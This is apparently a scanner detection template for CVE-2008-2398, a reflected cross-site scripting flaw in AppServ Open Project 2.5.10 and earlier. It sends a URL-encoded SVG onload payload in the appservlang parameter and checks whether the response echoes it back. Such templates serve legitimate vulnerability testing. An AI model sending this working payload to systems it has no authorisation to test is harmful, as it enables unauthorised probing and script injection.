44 lines
1.3 KiB
YAML
44 lines
1.3 KiB
YAML
id: CVE-2008-2398
|
|
|
|
info:
|
|
name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
|
|
author: unstabl3
|
|
severity: medium
|
|
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
|
reference:
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
|
- http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
|
|
- http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
|
|
- http://securityreason.com/securityalert/3896
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cve-id: CVE-2008-2398
|
|
cwe-id: CWE-79
|
|
cvss-score: 4.3
|
|
tags: cve,cve2008,xss
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "<svg/onload=confirm('xss')>"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
# Enhanced by mp on 2022/08/12
|